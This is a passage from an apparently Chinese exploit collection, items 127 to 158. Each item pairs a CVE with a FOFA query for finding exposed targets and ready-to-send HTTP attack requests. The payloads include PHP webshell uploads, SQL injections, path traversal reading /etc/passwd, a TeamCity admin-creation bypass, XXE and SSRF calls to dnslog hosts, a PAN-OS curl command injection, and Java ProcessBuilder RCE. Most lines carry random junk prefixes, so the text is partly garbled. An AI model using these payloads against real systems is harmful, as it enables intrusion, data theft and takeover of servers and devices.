: H' }3 v, z' U0 D' X! N3 K9 iContent-Disposition: form-data;name="SystemName"

( _  e0 |* I2 nBIM
& B: Z# w; p  }; T  R1 @------WebKitFormBoundaryJGgV5l5ta05yAIe0
7 H, m) ~! n0 Q# D- C$ W9 HContent-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
6 M; J" ^2 d# w: q4 Q. H3 p% E<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
5 L" J* Z) j* X; U>
& X/ m# e8 j, |! J" P<test>&t;</test>
; K; c9 S8 ?& p/ C4 i' q------WebKitFormBoundaryJGgV5l5ta05yAIe0--


3 B/ ]: A/ G2 c, c3 Z
3 n0 _, ]. [7 F* g1 E128. Adobe ColdFusion 反序列化
CVE-2023-38203
! \' O5 S4 V7 w0 L2 m+ hAdobe ColdFusion版本2018u17（以及早期版本）、2021u7（以及早期版本）和2023u1（以及早期版本）
FOFA：app="Adobe-ColdFusion"
* ?+ {" C5 i8 c8 V5 VPAYLOAD

4 S4 G; K0 _( j# t1 ]129. Adobe ColdFusion 任意文件读取
9 |1 H7 t* u2 R- A0 @+ a4 p$ hCVE-2024-20767
FOFA：app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
第一步，获取uuid
; p" G1 e: w8 Y% c% c' BGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
  y2 g9 }& y' Z! @' zHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
+ T# n  P0 O2 x% z2 uConnection: close
- ^& _( ^: }, t0 j) ^, p2 _
* I4 O6 b7 y1 u0 D& X/ ]9 q
0 ~% B; Z! i: ?& t# G! g第二步，读取/etc/passwd文件
' E8 W& |1 @% \9 IGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
; Y1 ~; y; ^+ ?  I* MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 e4 t1 V' P! [7 t( j$ M- jAccept: */*
Accept-Encoding: gzip, deflate
4 h* h7 U7 W. m- ZConnection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

+ D; Y. D7 b9 w1 H7 X0 @
3 {* |$ s7 ^2 k) @$ v130. Laykefu客服系统任意文件上传
' V, B" u* g4 QFOFA：icon_hash="-334624619"
" K9 Q* U/ o. EPOST /admin/users/upavatar.html HTTP/1.1
: e' l  Z/ S. a6 D  dHost: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
( z( Y- f0 R  m; sCookie: user_name=1; user_id=3
$ F- c' F2 P9 }2 G9 tConnection: close
" ~, d* F: w2 Z2 Y/ z$ h; X8 I
------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
8 \- t& m4 H: R( E% zContent-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

& x; ?4 o. j2 ]( i  Y  J
131. Mini-Tmall <=20231017 SQL注入
. w/ N, b4 b6 u" \& }FOFA：icon_hash="-2087517259"
后台地址：http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
% e$ a! n0 w. d% iCVE-2024-27198
FOFA：body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
" `) W2 V! ?. `. z7 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 Z3 v- I; V! j# |- H% y' aAccept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

3 J# W$ ~: x' V9 b$ B7 x
CVE-2024-27199
/res/../admin/diagnostic.jsp
) x$ A  f) M  }; P% s/.well-known/acme-challenge/../../admin/diagnostic.jsp
  U% Y& ^' d/ L+ o0 }+ R/update/../admin/diagnostic.jsp


) I) h1 [8 W6 fCVE-2024-27198-RCE.py

133. H5 云商城 file.php 文件上传
FOFA：body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
  a1 i( n# v+ z1 |# l% l
( M8 A* b3 j8 V8 [5 \------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

& d2 ~/ g! @" r$ {  P<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

5 k3 k: F4 W) ?: Z: S6 N
8 V5 J+ Q& [8 D
9 r( f. ^. b! l$ h1 H: d; K0 M134. 网康NS-ASG应用安全网关index.php sql注入
' _3 t" `6 g( a* n' r2 J. X& ?5 tCVE-2024-2330
; }! P: l# F5 }7 dNetentsec NS-ASG Application Security Gateway 6.3版本
FOFA：app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
: p) T: A! r: A) N5 f! D2 c, uHost: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
. S% q4 G$ j4 h5 d7 F, x$ ^% lSec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
8 @# O' T- E) x3 l6 f) R6 lTe: trailers
' [1 M1 z1 c0 |) i( }. r0 @  r4 J" AConnection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
3 A0 ?- q9 Y) \( }! Q

135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
8 K3 a  J" L" C0 K  f/ l0 l3 wCVE-2024-2022
; O0 F) p+ s4 b. U% d7 Z0 w# ~Netentsec NS-ASG Application Security Gateway 6.3版本
" N8 N+ V& p7 p  b! T1 vFOFA：app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ t6 ^4 p, ?# R/ E0 G# o3 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- I' u! w" Q5 i, d/ RAccept-Encoding: gzip, deflate
, W8 \8 ?# D1 X) L, j$ x3 {- ?  QAccept-Language: zh-CN,zh;q=0.9
; P7 K1 @" N  P# n, c% q$ tConnection: close


2 T9 A! {( H8 G3 l3 W: M$ G136. NextChat cors SSRF
6 h5 Z- y8 i6 g  l' o6 n5 fCVE-2023-49785
FOFA：title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
" L8 f% U$ S# U6 D7 bHost: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
  U/ H0 d# r$ `( d3 `+ T% ]Accept-Language: en
8 J/ N0 M$ Z# [, f" s: PAccept-Encoding: gzip
& n$ e- j; B, t3 o/ y
) M2 O  L# ^! w) a
: P1 _8 H. u4 A) l/ l/ i& f( W' M3 B137. 福建科立迅通信指挥调度平台down_file.php sql注入
CVE-2024-2620
FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
6 D' w4 L5 k  o7 X# W+ a+ ~+ O8 cHost: x.x.x.x
. Q8 |9 {5 f, W* x# q/ E8 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' O* j5 u! L8 s9 i( b2 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& I+ M3 |2 T5 {  ~' p# \" S6 VAccept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
0 z; M' Z2 F2 U6 s3 {7 E. m* H5 c! Z+ eUpgrade-Insecure-Requests: 1
& q7 }0 O/ S* k+ Z& G. _- C
# o" k$ X# f4 Y. f+ h4 B5 S
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 h3 U  }- u  W' L' _. vCVE-2024-2621
: {# C! q( P# V; }/ G4 AFOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
; c  ?: v# Z% p9 I/ {. cGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
- A3 s% Q  R5 @) i8 _7 `Host: x.x.x.x
+ [0 n8 a1 q: Z, g( ?) {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# e' M! b- \* M. Z/ IAccept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

* G6 ]% a8 [& l5 z9 t
; ~; p8 @6 G9 ^5 ~+ a139. 福建科立讯通信指挥调度平台editemedia.php sql注入
CVE-2024-2622
* d$ T8 H* g& X' B9 x8 `1 G: UFOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
9 `! l& q' @+ S5 SHost: x.x.x.x
9 X" W. e% E; r/ z2 z; a- b/ \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ f; R$ J9 y# k( NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1
5 T, ~! p( `5 F3 k& M# }

140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
CVE-2024-2566
FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
& m; E( s. N& b( O8 \GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
# H+ b, r4 U! x- HHost: x.x.x.x
3 y* H& K) Z. T6 b" ?+ Y% f" cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! X* H8 b6 M& c4 W& j7 @5 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
, T+ e) d% m2 M+ m# ]8 ZConnection: close
6 M$ h5 ?9 c9 Y0 o% ACookie: authcode=h8g9
Upgrade-Insecure-Requests: 1
9 N4 @3 G) T9 v, i

, ^) B; n6 f. z# f. G% H141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
6 b7 \9 T- ?, }* f; p. TFOFA：body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
( T0 F) U" ^9 z" E0 AHost: your-ip
8 ^' [% ]- m$ T! \9 ?  N0 u/ T1 ^User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
' ^7 j' f0 M- l. ?' _7 s% w% KContent-Type: application/x-www-form-urlencoded
( C9 n  T1 c' d0 Q* {. C/ {4 a( u9 Y
. n+ @0 c; g1 M% G/ m
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
2 ~+ R6 p7 ?0 _, }3 {. l3 i1 l6 h
* W3 H9 L3 `8 s8 j9 B$ T& e
142. CMSV6车辆监控平台系统中存在弱密码
4 g0 Q. v% m$ Q! h, ?CVE-2024-29666
FOFA：body="/808gps/"
admin/admin
0 P% D) D; z0 R5 \: x1 I143. Netis WF2780 v2.1.40144 远程命令执行
, S  E3 E. j0 i: c  K5 UCVE-2024-25850
9 \% V- F; o8 v. a& hFOFA：title='AP setup' && header='netis'
; n0 t+ T% _% H1 Q+ S4 E) `PAYLOAD

5 G1 [: `: [' O% c+ S144. D-Link nas_sharing.cgi 命令注入
FOFA：app="D_Link-DNS-ShareCenter"
" g+ M. \+ A  F2 O  nsystem参数用于传要执行的命令
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
+ }! x; D; @1 u3 \' s4 k8 OAccept-Language: en
8 h) Y4 c: D6 B5 F5 fAccept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
0 W- u$ X( e3 s- B" U& B$ A7 x+ J& yCVE-2024-3400
' H+ f  T6 G! V. |( a7 j; XFOFA：icon_hash="-631559155"
% M3 \% |+ m  |/ s, D  |GET /global-protect/login.esp HTTP/1.1
3 |" q! _: J8 x: y$ jHost: 192.168.30.112:1005
8 a$ y8 F/ A( VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip


; u7 ~& y% Q2 Y9 u3 c146. MajorDoMo thumb.php 未授权远程代码执行
CNVD-2024-02175
1 n4 I: J: [! w- W. aFOFA：app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
- g% ?8 A( O$ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
. V' O* R" [9 [0 _

7 n& z% Y9 ]! p' O6 K6 Z3 Z3 v" S147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 W4 |0 I# M5 s5 w, A: YCVE-2024-32399
FOFA：body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
" U- T; ?/ b/ \6 R5 {3 QHost: 127.0.0.1:81
Cache-Control: max-age=0
! {* Z: E. _" E; D6 {9 M8 S1 T1 oConnection: close
5 a! ~2 j2 l8 h, k) n3 V) k

148. CrushFTP 认证绕过模板注入
( i. h9 a' C# t0 g# T6 D8 c' hCVE-2024-4040
( q: m0 n9 e% C% Y( B3 Z: ~( j2 mFOFA：body="CrushFTP"
PAYLOAD

149. AJ-Report开源数据大屏存在远程命令执行
FOFA：title="AJ-Report"

5 \8 F6 f/ o5 D/ u) C4 u( ^, \POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
, Q, B- z+ _  VHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. n2 y  t# p/ g7 Q- B' G7 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
" g, s1 l7 `6 d9 w# L0 JContent-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 认证绕过与远程代码执行
& J4 ^! ?7 M+ x, V2 p0 K6 nFOFA：title="AJ-Report"
6 f# v4 L8 K" M* p" k8 I& fPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 N* x. B# B$ Q3 w" N: |; j. y" sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
5 ?8 C# t$ m5 @( PAccept-Language: zh-CN,zh;q=0.9
6 R* `8 ]2 I  X" b. c& Z. c% E% EContent-Type: application/json;charset=UTF-8
Connection: close
) l8 n  @$ a& s; g4 [Content-Length: 339

. S/ j! |" l. ^% [{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

, |7 g! {  `5 F7 ~, Z5 [
) j5 W! K6 i0 `! \6 T# N151. AJ-Report 1.4.1 pageList sql注入
/ m( R# j5 V1 ^8 _: Y1 p( WFOFA：title="AJ-Report"
( c  F; v6 G8 i& n! L9 f% oGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
$ n8 o( ^5 u7 D4 hHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


- D6 P" J& v, x* C9 B6 p! @2 Z4 f152. Progress Kemp LoadMaster 远程命令执行
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
  s% W( `( g+ g+ ^8 z( GLoadMaster<=7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
! `7 W: X! _! [' H4 ]" k  t# _FOFA：body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
5 K6 d; P" G9 R4 V+ C4 J" l8 WGET /access/set?param=enableapi&value=1 HTTP/1.1
0 j$ J# T+ a9 ~$ RHost: x.x.x.x
* x# y5 I( ?2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
; _* O) I$ {4 v4 ?  mAccept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
6 j! A4 O) S5 e; F- d7 dAccept-Encoding: gzip

. z( \$ u- b, X. w9 P9 D
153. gradio任意文件读取
CVE-2024-1561FOFA：body="__gradio_mode__"
; {9 G* I$ Y/ t7 r. A第一步，请求/config文件获取componets的id
8 I) y1 ^6 T" X& v8 l, m7 dhttp://x.x.x.x/config


第二步，将/etc/passwd的内容写入到一个临时文件
POST /component_server HTTP/1.1
* |9 j1 _' l4 NHost: x.x.x.x
- ~0 `& P& r& B7 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
  ?+ \& {7 y' Q! D) jConnection: close
7 }+ D' r( Z) ~6 ~Content-Length: 115
Content-Type: application/json
3 {( r) o, S$ F# T0 n* zAccept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
" I3 U, o# S: \7 p$ [8 R$ V* Z
8 A$ }+ Q( U6 B8 b+ Q2 h1 y, h% G
  z( {* G6 P5 P8 R3 H第三步访问
  f$ _( p, r' }( o; Jhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

  P, J7 G5 x$ o0 Y2 Z+ ^
154. 天维尔消防救援作战调度平台 SQL注入
CVE-2024-3720FOFA：body="天维尔信息科技股份有限公司" && title=="登入"
' d7 v$ ^4 o1 b( o- p: iPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
0 N& P1 _' I; Y' [8 N* vContent-Length: 106
Cache-Control: max-age=0
2 x: k# B. x* x) r2 l5 o9 m5 JUpgrade-Insecure-Requests: 1
: N+ B* d9 d. R$ ^Origin: http://x.x.x.x
3 ?  t: s' a, c; ?2 n0 D) TContent-Type: application/json
/ b# L9 H* W; c% YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
( T! r3 c) A1 U( X' ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 \9 @' ~# w7 W- `3 s' BReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
( n* W$ H1 _$ \$ z8 \% p/ l+ \Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
# c, `- L5 f* Y
+ k+ R" ]/ x; \{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
0 |. X$ i) P& X

155. 六零导航页 file.php 任意文件上传
3 y+ o# \) i3 `& h( W. y' d/ x1 NCVE-2024-34982
FOFA：title=="上网导航 - LyLme Spage"
4 \- k' Z% L- x( R2 G2 KPOST /include/file.php HTTP/1.1
; u2 x0 d. H( M% d  t# \Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. R1 Y5 Q& {8 u9 w: C: R  nConnection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
& S+ z) \0 k* t4 p+ ^( J+ \9 FAccept-Encoding: gzip, deflate, br
# e$ }* m6 u; [: NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: J# }" {" V. Z9 }& |" u6 qContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
9 v# m: c7 w; `0 K4 OX-Requested-With: XMLHttpRequest

- s: X. Y( d0 ]' Y' u2 l# _-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
  @5 t% y2 W6 J' a" fContent-Type: image/png
5 c6 \9 Y: A6 f
( p5 _2 p: q7 Y, S3 r<?php phpinfo();unlink(__FILE__);?>
# c1 W4 W. @9 v8 B: D% H, n-----------------------------qttl7vemrsold314zg0f--


& {9 A: H) _9 j3 ]访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

. \( _& \9 {  d( Q+ m156. TBK DVR-4104/DVR-4216 操作系统命令注入
- X3 R; q* S& r1 ECVE-2024-3721
% D7 a6 U) ]4 R& v- qFOFA："Location: /login.rsp"
4 B/ \) @% @- {. r( ^·TBK DVR-4104
·TBK DVR-4216
! W! f! O# f$ V) K$ Z" X" ^9 `* pcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


7 A% g2 ]# `  c$ k+ G* ~POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
" n7 r# F, [! g& V3 oHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 W* }3 N5 E: bConnection: close
Content-Length: 0
( e$ s3 ~& K: g2 v8 zCookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp 任意文件上传
CNVD-2023-06971
FOFA：body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
8 Z( l- [5 q+ z9 J' B9 j$ m  FHost: x.x.x.x
. v& I$ \1 p. {8 C& _9 \! w1 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. t. ~) H! c7 [$ x, L* KAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
, u6 [7 U5 ?1 O5 j( A# |: t% `Cache-Control: max-age=0
( e5 A* k5 w# X! R- W' E( X+ oConnection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
+ r) f0 m  A0 W1 [0 [Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
. @, w/ `8 J7 ]1 g( g1 ?( `" _5 _& gContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
9 A# T" T# `- D6 sContent-Type: application/octet-stream

5 l0 ]) b9 g; ~4 Onyhelxrutzwhrsvsrafb
7 U0 i& ^) H& D------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"
) \* u8 q9 ?& ]+ y. r) g
null
------WebKitFormBoundary1imovELzPsfzp5dN
; k# `( Y2 m) L3 a0 o9 F% WContent-Disposition: form-data; name="form"
8 J0 ?( O& O9 J, O; x1 ?0 h
null
------WebKitFormBoundary1imovELzPsfzp5dN
  @& W5 c  T$ g4 k) p5 _* b  W4 fContent-Disposition: form-data; name="field"

null
  W8 f0 A. y3 Y------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

, X7 g4 Y0 Z1 D! G6 O2 \3 i2 h# ~null
: u' @* M" \) f0 \1 r2 q------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"
! f7 y$ p; N0 p8 [: r
0 U, F9 R$ G% s) C  rnull
------WebKitFormBoundary1imovELzPsfzp5dN--
2 W* B/ _0 o9 c2 z" b! d7 j* V/ @0 r

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura-CMS-processAsyncObject存在SQL注入
CVE-2024-32640
2 y* {$ r, R+ p( EFOFA："Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
